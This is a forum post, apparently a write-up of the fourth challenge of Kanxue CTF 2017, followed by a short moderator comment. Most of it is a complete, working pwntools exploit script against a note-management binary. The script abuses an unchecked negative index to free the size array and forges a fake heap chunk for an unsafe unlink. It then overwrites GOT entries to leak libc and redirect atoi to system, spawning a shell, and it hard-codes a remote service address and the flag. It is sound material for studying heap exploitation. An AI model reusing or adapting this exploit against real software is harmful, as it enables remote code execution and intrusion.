[原创]看雪CTF2017 第四题 PWN逆向分析


详细过程已更新,详见附件,贴上poc:

from pwn import *
import binascii
import time
#PediyCTF{n0_pwn_n0_fun_233}
# Target selection: g_local=True spawns ./pediy locally and pauses so a
# debugger (IDA/gdb) can attach before any input is sent; otherwise the
# script talks to the remote CTF service.  Every helper below uses `sh`.
g_local=True
context.log_level='debug'
sh = process("./pediy") if g_local else remote("211.159.216.90",51888)
if g_local:
    # Wait for the operator to attach a debugger to the child process.
    raw_input("ida has attch? Press any key for continue...")
def welcome():
    """Pass the program's password prompt.

    Reads up to the first "$ " prompt (echoing it for the debug log),
    sends the password "pediy", and returns everything up to the next
    prompt, i.e. the main menu.
    """
    banner = sh.recvuntil('$ ')
    print banner
    sh.sendline("pediy")
    menu = sh.recvuntil('$ ')
    return menu
# Log in once at load time; the returned menu is only printed for the log.
menu_text = welcome()
print menu_text
def free(id):
    """Menu option 2: delete the note at index `id`.

    Returns the raw bytes the program printed after the index was sent.
    The unlink chain relies on this: once free@got points at puts@plt the
    response starts with the leaked pointer rather than a menu, which is
    presumably why the original waits a fixed second instead of using
    recvuntil('$ ').  Callers pass negative indices (free(-2)), so the
    target evidently does not bounds-check this value.
    """
    sh.sendline('2')
    prompt = sh.recv(1024)
    print prompt
    sh.sendline(str(id))
    # Fixed delay rather than a prompt wait; see docstring.
    time.sleep(1)
    reply = sh.recv(2048)
    return reply
def create(size,id,context):
    """Menu option 1: allocate a note of `size` bytes at index `id` filled
    with `context` (the note body; the parameter shadows pwntools'
    `context` inside this function only).

    Each menu answer is preceded by draining the program's prompt so the
    debug log shows the dialogue.  Returns output up to the next "$ ".
    """
    for answer in ('1', str(size), str(id)):
        sh.sendline(answer)
        print sh.recv(1024)
    sh.sendline(str(context))
    return sh.recvuntil("$ ")
def edit(id,payload):
    """Menu option 3: overwrite the note at index `id` with `payload`.

    The payload is written with send(), not sendline(), so no trailing
    newline ends up in the heap/GOT bytes being forged.  Returns up to
    2048 bytes of the program's response.
    """
    for answer in ('3', str(id)):
        sh.sendline(answer)
        print sh.recv(1024)
    sh.send(payload)
    return sh.recv(2048)
    
def test_Double_free():
    """Experimental double-free probe; not called by this script.

    Frees index 0 in the classic free(a), free(b), free(a) order, then
    lets the operator type the address to plant as the next pointer in
    the freed chunk.  The later create() calls walk the corrupted free
    list; raw_input() pauses give a debugger a chance to inspect the
    heap between steps.  Note the 20-byte payload is written into a
    16-byte note, which is part of the experiment rather than a slip.
    """
    create(16,0,"sssss")
    create(16,1,"xxxxxxxxxxx")
    for idx in (0, 1, 0):
        free(idx)
    print("write new trunk address:")
    target = raw_input("new address:")
    payload = p64(int(target,16)) + 'A'*12
    create(16,0,payload)
    raw_input()
    create(16,0,"1111111111111")
    create(16,0,payload)
    create(16,0,"1111111111111")
    raw_input()
    for _ in range(3):
        create(16,0,"1111111111111")
def test_2():
    """Experimental probe; not called by this script.

    Frees the out-of-range index -2 and then requests a 20-byte note to
    see whether the allocator hands that memory back, writing a pointer
    into it.
    """
    create(16,0,"sssss")
    free(-2)
    print("write new trunk address:")
    probe = p32(0x6020e8) + "xxxxxxxxxx"
    create(20,0,probe)
# Absolute addresses in the target binary used by test_unlink().  The
# 0x60xxxx / 0x40xxxx values only make sense for a fixed-base (non-PIE)
# build, so a rebuilt target would need these re-read from the binary.
g_dest_list=0x6020e0   # global array of note pointers (see edit(0,...) below)
free_got_plt=0x602018  # GOT slot of free()  -> hijacked to puts@plt for the leak
puts_got_plt=0x602020  # GOT slot of puts()  -> read to leak libc
puts_plt=0x4006d0      # puts@plt, written into free's GOT slot
atoi_got_plt=0x602058  # GOT slot of atoi()  -> hijacked to system()
# Fake-chunk fd/bk for the unsafe-unlink: fd->bk and bk->fd both resolve to
# g_dest_list, so the unlink macro's check passes and writes
# &g_dest_list - 0x18 into g_dest_list[0].
fd, bk = g_dest_list - 0x18, g_dest_list - 0x10
def test_unlink():
    """Full exploit chain: unsafe-unlink -> arbitrary write over g_dest_list
    -> GOT hijack (free->puts to leak libc, atoi->system to pop a shell).

    Steps as they appear below:
      1. allocate two 0x80-byte notes at index 0 and 1;
      2. free(-2) releases the size array (per the original comments), and
         the next create() gets that memory back, so note 0's recorded size
         can be enlarged to 0x100 while note 1's is kept;
      3. edit(0) can now overflow into note 1: a fake chunk (fd/bk aimed at
         g_dest_list) is placed in note 0 and note 1's prev_size/size header
         is forged with PREV_INUSE cleared;
      4. free(1) consolidates backward and unlinks the fake chunk, leaving
         g_dest_list[0] = &g_dest_list - 0x18;
      5. edit(0) therefore writes g_dest_list itself, pointing notes 0/1/2
         at the free, puts and atoi GOT slots;
      6. free@got := puts@plt, free(1) prints puts's libc address, system is
         computed from hard-coded libc offsets, atoi@got := system, and the
         next menu input "/bin/sh" goes through atoi -> system("/bin/sh").
    raw_input() pauses precede the risky steps so a debugger can be used.
    """
    FIRST_TRUNK_SIZE=0x80
    SECOND_TRUNK_SIZE=0x80
    create(FIRST_TRUNK_SIZE,0,"1"*FIRST_TRUNK_SIZE)
    create(SECOND_TRUNK_SIZE,1,'2'*SECOND_TRUNK_SIZE)
    
    # Free the size array (g_dwSizeAry) via the unchecked negative index.
    free(-2)
    
    #raw_input("change size")
    # The next malloc returns the g_dwSizeAry memory, so this "note" rewrites
    # the recorded sizes: index 0 becomes twice as large (enables the
    # overflow in the next edit), index 1 is kept.
    #payload=p32(0x20)+p32(0x20)+p32(FIRST_TRUNK_SIZE*2)+p32(SECOND_TRUNK_SIZE)+p32(0)
    size_payload=""
    size_payload+=p32(FIRST_TRUNK_SIZE*2) #  index=0  change size
    size_payload+=p32(SECOND_TRUNK_SIZE)  #  index=1  keep
    size_payload+=p32(0)
    size_payload+=p32(0)
    size_payload+=p32(0)
    create(20,2,size_payload)
    
    #raw_input("edit note0")
    # Edit index 0: build a fake free chunk inside note 0 and overflow into
    # note 1's chunk header.
    payload1=""
    payload1+=p64(0)    # fake prev_size (chunk marked unused = 0)
    payload1+=p64(0x81) # fake size: 0x80 | PREV_INUSE
    payload1+=p64(fd)  # fake fd  (&g_dest_list - 0x18), NOT free_got_plt
    payload1+=p64(bk)  # fake bk  (&g_dest_list - 0x10)
    payload1+='A'*(FIRST_TRUNK_SIZE-8*4)
    payload1+=p64(len(payload1)) # note 1's prev_size = distance back to the fake chunk
    payload1+=p64(SECOND_TRUNK_SIZE+0x10)  # note 1's size = 0x90 with PREV_INUSE clear
    
    edit(0,payload1)
    
    
    raw_input("unlink") 
    # free(1): backward consolidation unlinks the fake chunk, so
    # g_dest_list[0] = &g_dest_list - 0x18 (the unlink check passes because
    # fd->bk == bk->fd == g_dest_list).
    free(1)
    
    # Edit index 0 now writes at &g_dest_list - 0x18 (0x6020c8): the first
    # three qwords pad up to g_dest_list, then pointer/flag pairs follow.
    # The layout below (pointer, flag) per note is taken from the original
    # comments; it is what the target's note table looks like in memory.
    edit_paylaod=""
    edit_paylaod+=p64(0)
    edit_paylaod+=p64(0)
    edit_paylaod+=p64(0)
    edit_paylaod+=p64(free_got_plt) # g_dest_list[0] -> free@got, so edit(0) rewrites free's GOT entry
    edit_paylaod+=p64(1) #g_dwFlag[0]
    edit_paylaod+=p64(puts_got_plt) # g_dest_list[1] -> puts@got, so free(1) "frees" (prints) it
    edit_paylaod+=p64(1) #g_dwFlag[1]
    edit_paylaod+=p64(atoi_got_plt) # g_dest_list[2] -> atoi@got, target for the system() write
    edit_paylaod+=p64(1) #g_dwFlag[2]
    
    #edit(0,p64(0)+p64(0)+p64(0)+p64(free_got_plt)+p64(1)+p64(0x602058)+p64(1)+p64(0x602058))
    edit(0,edit_paylaod)
    #raw_input("change free_got_plt to puts_plt ")
    # free@got := puts@plt; from here on every free(x) is puts(g_dest_list[x]).
    edit(0,p64(puts_plt))
    
    # Leak: free(1) now prints the 8-byte content of puts@got.  Only the
    # first 6 bytes of the response are taken (a userland x86-64 pointer),
    # then zero-padded to 8 bytes for u64.  This assumes the leaked bytes
    # are the very first thing the program prints after the index is sent.
    #raw_input("leak puts_got_plt addr ")
    xx=free(1)
    str_puts_addreess=xx[0:6]
    print str_puts_addreess
    str_puts_addreess=str_puts_addreess+"\x00\x00"
    
    
    raw_input("calc system address")
    # system = puts - offset(puts) + offset(system); the offsets are
    # hard-coded for the author's local libc vs. the remote libc and must be
    # re-derived for any other libc build.
    if g_local:
        system_address=u64(str_puts_addreess)-0x6f690+0x45390
    else:
        system_address=u64(str_puts_addreess)-0x6cee0+0x41fd0
    
    print "system_address",hex(system_address)
    # Overwrite atoi@got (note index 2, see edit_paylaod above) with system.
    # The prompt text says "puts_got_plt" but the write goes to atoi's slot.
    raw_input("chage puts_got_plt to system_address ")
    edit(2,p64(system_address))
    
    # The menu reads a line and passes it to atoi(), which is now system(),
    # so sending "/bin/sh" runs system("/bin/sh").
    sh.sendline("/bin/sh")
    #get shell 
    sh.interactive()
    
# Runs the exploit chain as soon as the script is executed (no __main__
# guard); the trailing raw_input() keeps the script alive after
# interactive() returns so the target process is not torn down immediately.
test_unlink()  
raw_input()




kanxue 8 2017-6-9 18:50
等有详细说明再设精华或优秀